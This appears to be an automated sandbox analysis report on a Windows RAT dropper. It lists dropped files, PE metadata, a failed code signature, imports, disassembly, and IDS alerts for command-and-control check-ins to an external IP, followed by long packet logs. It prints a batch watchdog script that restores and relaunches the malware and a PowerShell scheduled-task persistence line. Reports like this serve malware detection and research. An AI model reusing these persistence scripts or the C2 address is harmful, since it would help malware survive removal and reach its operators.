                                            Preview:@echo off..:CheckProcess..set "ProcessName=Update.exe"..set "ProcessPath=C:\Users\Public\Bilite\Axialis\Update.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bilite\Axialis\Update.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..
                                            Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):4
                                            Entropy (8bit):2.0
                                            Encrypted:false
                                            SSDEEP:3:EX:EX
                                            MD5:8BCF57CAA3CCB4C6C1A633674F4AAA84
                                            SHA1:167895235D38BF0CA3C9C3F9DD65CF45625D5EA4
                                            SHA-256:C7D02069EA9E317E7ED126A3FAAF2F16B9949E3B072BA2E646CDEA10069D890E
                                            SHA-512:DE96465D98D942E568AA5A4FEF30740BAF618328E1B725217692F3F3B93F5B4D6F1C5430E9081254120DD04A1216F1E8A9C54017C9EB8137785B15AB9D4D056A
                                            Malicious:false
                                            Preview:8012
                                            Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):151
                                            Entropy (8bit):4.741657013789009
                                            Encrypted:false
                                            SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                            MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                            SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                            SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                            SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                            Malicious:true
                                            Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                            Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 30 01:43:13 2024, mtime=Mon Dec 30 01:43:13 2024, atime=Thu Nov 21 08:19:09 2024, length=4106352, window=hide
                                            Category:dropped
                                            Size (bytes):1086
                                            Entropy (8bit):4.712485565261973
                                            Encrypted:false
                                            SSDEEP:12:8TvlUlGIZQCICHqXs3XkACmqy2fl5SlFEpOjAU/G6EWaviKpsaG44t2YZ/elFlSd:8T0GFiHZE4AoEjvFXqyFm
                                            MD5:1425E429C9E6C7477F37DF51283FFB62
                                            SHA1:AC47191C38DC914990C5AFFD63D5E3B6896884CE
                                            SHA-256:0CA00E18BDED43F09E27BF04775C7D9A2D6B1D5D438CFE8AB2DD2C1B0D1CEA28
                                            SHA-512:6DC5C982AC8F58D9B672A78EDA03BCBE6284C1A9184AA82CCA14BF857AA376E1AF48A37662273DA70C67B905E9A905311AC9F01687623BB036711A3125EDC826
                                            Malicious:false
                                            Preview:L..................F.... ....{A.dZ....n.dZ..`,.k.;..p.>..........................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.Ya.....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Yc...Public..f......O.I.Yh.....+...............<.....T...P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1......Yg...Bilite..>......Yc..Yg.............................S.B.i.l.i.t.e.....x.2.p.>.uYeJ .WINRAR~1.EXE..\......Yg..Yg.....T.......................Y.w.i.n.r.a.r.-.x.6.4.-.7.0.0.s.c.p...e.x.e.......[...............-.......Z............u......C:\Users\Public\Bilite\winrar-x64-700scp.exe..).....\.....\.P.u.b.l.i.c.\.B.i.l.i.t.e.\.w.i.n.r.a.r.-.x.6.4.-.7.0.0.s.c.p...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......580913...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3
                                            Process:C:\Windows\SysWOW64\timeout.exe
                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                            Category:dropped
                                            Size (bytes):118
                                            Entropy (8bit):4.231779304291169
                                            Encrypted:false
                                            SSDEEP:3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUW:hYFRamFSQZ0lv5y/9JctESnQUW
                                            MD5:EA4370C6D3E1915502DEABAFCFE379F1
                                            SHA1:B32FFD2D69DF742E47EA86D0D739717CF6B147D3
                                            SHA-256:A8DFD19D19766FFD7DBEE9742F933099850C2594A81BDD38CA900A8255FD3B92
                                            SHA-512:C66EC971096851DF7A923F0602F6760AA544B84D474515E1A10B31FC44A473A7A3CA66370475084931A920BA45558EEE5BCCAEB82A4781FEF302CDF68AF00266
                                            Malicious:false
                                            Preview:..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.99988625048371
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:6f0slJzOrF.exe
                                            File size:73'598'737 bytes
                                            MD5:e0b31f24aa1b867b395d4f62f15dc51a
                                            SHA1:f3c915a4d1ef71e74978e8f14c809e2d2012e8ad
                                            SHA256:090e553ac4ce1567dddc7548139b14c7645bf1dae7ec608730d6894a783c0b89
                                            SHA512:adf922a11063cbf9a8c88e223bdc50c241b6b3aee13562a93fc0da700352ff9f7ca4aac4a1a8c167515d03f472b39d50d452e7e9b801eac1d40699a4596d6f0b
                                            SSDEEP:1572864:MK6Kz6KxLBN+7kTzc1hIrf0UpLE112AVK6Z6YYIuhi0l:1eOe7kTzg2pLEHV/ZyEg
                                            TLSH:6FF73343FB0E1DDDE396597A5CF483B411FFC6952AA9BE526AC344070ECA801964F0EE
                                            File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................@...............................................P........................b..).
                                            Icon Hash:01e0f2ccd4d4c400
                                            Entrypoint:0x411def
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:
                                            Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:b5a014d7eeb4c2042897567e1288a095
                                            Signature Valid:false
                                            Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                            Signature Validation Error:The digital signature of the object did not verify
                                            Error Number:-2146869232
                                            Not Before, Not After
                                            • 18/07/2022 01:00:00 18/07/2024 00:59:59
                                            Subject Chain
                                            • CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
                                            Version:3
                                            Thumbprint MD5:8164525B12F9B6829CCD5054865F2D41
                                            Thumbprint SHA-1:583F01EE72450A9945FB1CFA539BAAB983D3F1D9
                                            Thumbprint SHA-256:2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
                                            Serial:7098774ED29B0565AB114EF2F2871CF7
                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            push FFFFFFFFh
                                            push 00414C50h
                                            push 00411F80h
                                            mov eax, dword ptr fs:[00000000h]
                                            push eax
                                            mov dword ptr fs:[00000000h], esp
                                            sub esp, 68h
                                            push ebx
                                            push esi
                                            push edi
                                            mov dword ptr [ebp-18h], esp
                                            xor ebx, ebx
                                            mov dword ptr [ebp-04h], ebx
                                            push 00000002h
                                            call dword ptr [00413184h]
                                            pop ecx
                                            or dword ptr [00419924h], FFFFFFFFh
                                            or dword ptr [00419928h], FFFFFFFFh
                                            call dword ptr [00413188h]
                                            mov ecx, dword ptr [0041791Ch]
                                            mov dword ptr [eax], ecx
                                            call dword ptr [0041318Ch]
                                            mov ecx, dword ptr [00417918h]
                                            mov dword ptr [eax], ecx
                                            mov eax, dword ptr [00413190h]
                                            mov eax, dword ptr [eax]
                                            mov dword ptr [00419920h], eax
                                            call 00007F37D07F97E2h
                                            cmp dword ptr [00417710h], ebx
                                            jne 00007F37D07F96CEh
                                            push 00411F78h
                                            call dword ptr [00413194h]
                                            pop ecx
                                            call 00007F37D07F97B4h
                                            push 00417048h
                                            push 00417044h
                                            call 00007F37D07F979Fh
                                            mov eax, dword ptr [00417914h]
                                            mov dword ptr [ebp-6Ch], eax
                                            lea eax, dword ptr [ebp-6Ch]
                                            push eax
                                            push dword ptr [00417910h]
                                            lea eax, dword ptr [ebp-64h]
                                            push eax
                                            lea eax, dword ptr [ebp-70h]
                                            push eax
                                            lea eax, dword ptr [ebp-60h]
                                            push eax
                                            call dword ptr [0041319Ch]
                                            push 00417040h
                                            push 00417000h
                                            call 00007F37D07F976Ch
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x150dc0xb4.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x190d7.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x462ddf90x2918
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x130000x310.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x113170x11400797279c5ab1a163aed1f2a528f9fe3ceFalse0.6174988677536232data6.576987441854239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x130000x30ea0x32001359639b02bcb8f0a8743e6ead1c0030False0.43828125data5.549434098115495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x170000x292c0x8009415c9c8dea3245d6d73c23393e27d8eFalse0.431640625data3.6583182363171756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x1a0000x190d70x19200aedf42f084dabb70902985d8cb8d4f42False0.14223802860696516data4.481844282645869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x1a2080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.42819148936170215
                                            RT_ICON0x1a6700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.2767354596622889
                                            RT_ICON0x1b7180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.2513485477178423
                                            RT_ICON0x1dcc00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.17170524326877656
                                            RT_ICON0x21ee80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584RussianRussia0.09922512717378446
                                            RT_GROUP_ICON0x327100x4cdataRussianRussia0.7763157894736842
                                            RT_VERSION0x3275c0x350dataEnglishUnited States0.47523584905660377
                                            RT_VERSION0x32aac0x3b0dataChineseChina0.4523305084745763
                                            RT_MANIFEST0x32e5c0x27bASCII text, with very long lines (635), with no line terminatorsEnglishUnited States0.5118110236220472
                                            DLLImport
                                            COMCTL32.dll
                                            KERNEL32.dllGetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
                                            USER32.dllCharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                            GDI32.dllGetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                            SHELL32.dllSHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                            ole32.dllCoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                            OLEAUT32.dllVariantClear, OleLoadPicture, SysAllocString
                                            MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp
                                            Language of compilation systemCountry where language is spokenMap
                                            RussianRussia
                                            EnglishUnited States
                                            ChineseChina
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-12-30T03:44:29.546494+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449924154.82.85.7918091TCP
                                            2024-12-30T03:45:39.297430+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449953154.82.85.7918091TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 30, 2024 03:44:25.659112930 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:25.663950920 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:25.664014101 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.433526039 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.433542967 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.433553934 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.433564901 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.433581114 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.433589935 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.433630943 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.484683037 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.646327019 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.646341085 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.646353006 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.646367073 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.646373034 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.646393061 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.646433115 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.646785975 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.646797895 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.646814108 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.646822929 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.646823883 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.646852970 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.647211075 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.647250891 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.647259951 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.647270918 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.647301912 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.859493017 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.859517097 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.859529972 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.859539986 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.859551907 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.859575987 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.859613895 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.859931946 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.859944105 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.859955072 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.859966040 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.859977961 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.859983921 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.860014915 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.860797882 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.860809088 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.860820055 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.860831022 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.860862970 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.860889912 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:26.943685055 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:26.984704971 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.072438955 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.072459936 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.072472095 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.072514057 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.072567940 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.072608948 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.072623014 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.072637081 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.072660923 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.072671890 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.072678089 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.072712898 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.073640108 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.073652029 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.073662996 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.073673010 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.073678970 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.073683977 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.073694944 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.073703051 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.073721886 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.074537039 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.074547052 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.074557066 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.074568033 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.074574947 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.074579954 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.074599028 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.074620008 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.285501003 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.285550117 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.285562038 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.285573959 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.285584927 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.285614967 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.285799980 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.285851955 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.285861015 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.285861969 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.285876989 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.285897970 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.286251068 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286262035 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286273956 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286284924 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286295891 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286302090 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.286338091 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.286861897 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286871910 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286884069 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286894083 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286905050 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286916018 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286916018 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.286926985 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286937952 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.286947966 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.286978006 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.287755013 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.287767887 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.287776947 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.287787914 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.287807941 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.287842035 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.498505116 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498589993 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498601913 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498614073 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498626947 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498640060 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498651028 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498651981 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.498697996 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.498862982 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498872042 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498919964 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.498922110 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498940945 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498950958 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.498960972 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.498996973 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.499325037 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499335051 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499346972 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499356031 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499366045 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499372959 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.499376059 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499398947 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.499423027 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.499856949 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499867916 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499877930 CET1885249899154.82.85.79192.168.2.4
